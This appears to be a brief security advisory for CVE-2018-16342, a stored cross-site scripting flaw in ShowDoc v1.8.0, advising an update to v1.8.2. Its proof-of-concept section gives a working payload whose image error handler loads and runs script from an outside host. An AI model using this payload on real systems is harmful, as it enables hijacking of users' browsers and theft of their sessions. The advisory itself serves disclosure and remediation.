Cross-site Scripting (XSS) Vulnerability in the showdoc/showdoc library

 

 

Cross-site Scripting (XSS) Vulnerability in the showdoc/showdoc library - CVE-2018-16342

Overview

ShowDoc v1.8.0 is vulnerable to stored XSS in "Creat a new page" function

PoC

Type this payload in the body of the new page

 <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xxe.im/peKD';>

Remediation

Update to ShowDoc v1.8.2

Resources

Ready to be protected?

14 days trial , No credit card upfront , Risk free